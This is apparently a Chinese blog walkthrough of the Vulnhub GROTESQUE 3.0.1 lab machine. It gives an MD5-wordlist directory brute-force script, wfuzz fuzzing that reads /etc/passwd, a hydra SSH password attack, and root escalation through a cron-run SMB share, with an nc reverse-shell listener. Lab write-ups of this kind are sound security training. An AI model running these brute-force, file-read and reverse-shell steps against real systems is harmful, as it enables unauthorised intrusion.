Vulnhub-GROTESQUE: 3.0.1渗透

疯狂搞网安的18岁老登

已于 2024-01-10 22:57:54 修改

阅读量1.1k

点赞数 28

分类专栏： Vulnhub靶机渗透文章标签：安全网络安全计算机网络网络安全威胁分析

于 2023-12-03 00:49:47 首次发布

本文链接：https://blog.csdn.net/laoyanCZ/article/details/134754461

版权

Vulnhub靶机渗透专栏收录该内容

21 篇文章 3 订阅

订阅专栏

文章目录

一、前言
开始实战

一、前言

由于在做靶机的时候，涉及到的渗透思路是非常的广泛，所以在写文章的时候都是挑重点来写，尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
如果不会导入Vulnhub靶机和配置网络环境的话，请点我直达发车文章！

👉本文靶机下载连接-戳我直接下载！👈

1、靶机ip配置

Kali IP：192.168.2.103
靶机IP：192.168.2.130靶机ip获取方式如下图

2、渗透目标

获取到/root/目录下的flag文件

3、渗透概括

图片找线索
字典所有内容转md5脚本编写
web目录爆破
ssh爆破
定时任务smb提权

开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示 在这里插入图片描述
可以看到，开放的端口还是比较的多
发现了几个常用端口服务22/ssh 80/http

22/sshssh可以直接pass掉了，这个版本基本上没有什么可利用的漏洞了，一般获取到了用户信息才使用这个

80/http基本上大部分的漏洞都是存在于web服务上，我们访问看看，如下图。发现有一个atlas，我们点击一下
在这里插入图片描述

打开发现是一副图，根据上面的提示，我们看到这个图片里面有一个地图
有一个m和d字母，再加上5个x那么这个靶机的线索可能就会跟md5有关
在这里插入图片描述

二、爆破

那么我们就试一下把目录字典的每一个目录名用md5加密之后再爆破
我这里自己写一个python脚本用于爆目录

import hashlib
import requests
#打开字典文件
with open("/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt", "r") as f:
	#这里是把读取到的字符串分解成数组
	all_list = f.read().split("\n")

#这里是遍历数组
for i in all_list:
	#这里是每个目录加密成md5（一定要拼接一个\n要不然爆不出来）
	web_file = hashlib.md5((i+"\n").encode()).hexdigest()  + ".php"

	#这里就用get请求开始跑了，这里需要把ip改为自己的靶机IP哦
	rp = requests.get("http://192.168.2.130/" + web_file)
	print(web_file  + "->" + str(rp.status_code))

	#当返回结果不为404的时候就跳出循环并且打印
	if int(rp.status_code) != 404:
		print("(" + i + ") md5 is:/" + web_file)
		break

过了一段时间……，如下，发现跑出来了，它的完整名称应该是ih\n，只有这样才能得到对应的md5值
在这里插入图片描述

我们现在访问一下这个爆出来的php文件，如下所示，一篇空白
在这里插入图片描述
那么我们就用wfuzz爆一下参数吧
如下图所示，爆破出来了一个purpose参数

wfuzz -c -u "http://192.168.2.130/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hl 0

在这里插入图片描述

我们通过给purpose参数传/etc/passwd来看看当前靶机的用户情况
如下图，发现了一个freddie用户，那么接下来就有操作空间了
在这里插入图片描述

三、再次爆破

由于是一步一步来的，原先python生成的md5值没有保存起来
我们这里用下面的命令再生成一下md5的字典

for i in $(cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt); do echo $i | md5sum|awk '{print $1}' >> weblist.txt ; done

用生成的字典和hydra跑一下freddie的密码

hydra -l freddie -P weblist.txt -t 32 -s 22 192.168.2.130 ssh

如下，密码跑出来了61a4e3e60c063d1e472dd780f64e6cad
在这里插入图片描述

并且用ssh可以正常登录，如下
在这里插入图片描述

四、提权

由于sudo -l和suid都没有找到什么好利用的
我们用pspy64看看有木有什么定时任务
用scp把这个文件传到freddie的家目录下面去（GitHub直达下载链接，如果不能下的话，在我博客资源里面有免费提供）
在这里插入图片描述

用chmod +x pspy64给这个文件一个执行权限，然后./pspy64运行就好了
在这里插入图片描述

扫描结果比较多的多，往下面多扒拉一下，就会发现每隔一段时间就以root权限运行/smbshare/目录下的所有文件，那么就可以开始上操作了
在这里插入图片描述

我们用ss -lulnp看一下，发现了有一个445的smb端口，之前用nmap没扫到，那么我们就可以直接操作了
在这里插入图片描述

我们用下面的命令生成一个shell，方便我们等下上传，并且在kali里面打开一个另外一个终端，用nc -lvvp 5555命令监听
在这里插入图片描述

发现了一个grotesque共享目录，用smbclient -L //127.0.0.1/看看目录（密码随便输就ok了）
在这里插入图片描述

我们把-L去掉，进入命令环境，并且用put指令上传一下这个shell
在这里插入图片描述

过一下下就可以看到我们的nc已经监听到了，并且就是root权限了
在这里插入图片描述

我们直接catroot目录下的root.txt的flag文件，拿到flag，我们的渗透就完成啦！！
在这里插入图片描述

疯狂搞网安的18岁老登

关注

28
点赞
踩
18

收藏

觉得还不错? 一键收藏
打赏
3
评论
Vulnhub-GROTESQUE: 3.0.1渗透

由于在做靶机的时候，涉及到的渗透思路是非常的广泛，所以在写文章的时候都是挑重点来写，尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话，请点我直达发车文章！👉本文靶机下载连接-戳我直接下载！👈。
复制链接

扫一扫